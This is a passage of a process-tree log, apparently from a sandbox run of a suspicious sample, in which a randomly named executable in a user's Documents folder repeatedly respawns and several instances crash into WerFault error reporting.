    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:7224
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7224 -s 24
      4⤵
      PID:13256
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:12408
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:13540
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:13964
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:13068
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:13272
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:4936
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:14352
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:14720
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:15272
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:14596
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:15148
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:11972
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:14372
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:7568
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:3788
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:6780
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:11596
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:13000
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:15508
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:15768
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:16192
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:11680
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:15616
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:16184
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:11304
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:9928
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:9820
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:10624
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:15976
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:9904
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:7524
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:9372
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:13692
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:15628
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:15600
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:14176
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:4640
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:15660
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:11564
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:16240
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:16656
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:16948
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:17108
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:14176
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:16556
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:16740
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:3840
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:2124
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:14640
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:17400
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:14928
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:4992
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4992 -s 24
      4⤵
      PID:12008
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:17244
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:14780
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:13240
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:14392
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:208
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:16620
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:17676
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:17976
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:18404
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:17416
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:16708
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:17728
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:18176
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:18348
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:17684
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:18252
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:17200
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:18312
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:16116
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:18344
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 18344 -s 24
      4⤵
      PID:13680
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:13348
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:18156
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:18644
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:18860
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:19264
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:16548
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:17776
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:17468
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:11972
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:17672
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:19248
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:16124
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:17984
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:19396
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:18684
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:14180
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:17580
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:19208
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:19516
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:19760
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:20032
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:20256
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:19796
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:20304
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:8504
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:19344
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:13728
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:20584
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:20748
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:19980
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:21180
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:21472
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 21472 -s 24
      4⤵
      PID:18204
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:20728
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:20488
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:21420
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 21420 -s 24
      4⤵
      PID:16224
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:20552
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:19104
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:21080
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:8276
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:20000
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:20768
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:21640
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:21888
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:22440
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 22440 -s 24
      4⤵
      PID:6196
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:16084
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:20188
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:22060
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:22360
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:22124
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:21952
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:15860
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:6120
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:20772
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:22168
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:21568
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:21688
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:11568
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:20456
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:22680
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:22976
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:15112
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:21672
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:23224
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:10776
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:22660
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:23476
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:22284
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:19384
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:22268
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:11664
